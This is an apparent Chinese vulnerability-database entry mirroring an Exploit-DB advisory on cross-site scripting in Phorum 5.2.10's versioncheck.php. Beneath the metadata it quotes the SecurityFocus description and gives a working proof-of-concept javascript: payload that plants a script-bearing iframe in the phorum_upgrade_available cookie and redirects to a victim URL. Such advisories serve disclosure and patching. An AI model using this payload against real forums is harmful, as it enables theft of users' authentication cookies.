Phorum 5.2 - 'versioncheck.php?upgrade_available' Cross-Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057691 漏洞类型
发布时间 2009-04-16 更新时间 2009-04-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32913
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/34551/info
   
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
   
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
   
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected. 

javascript:with(document)cookie="phorum_upgrade_available=
<iframe/src='javascript:alert(/voodoo/.source)'>",
location="http://www.victim.com/phorum-5.2.10/versioncheck.php";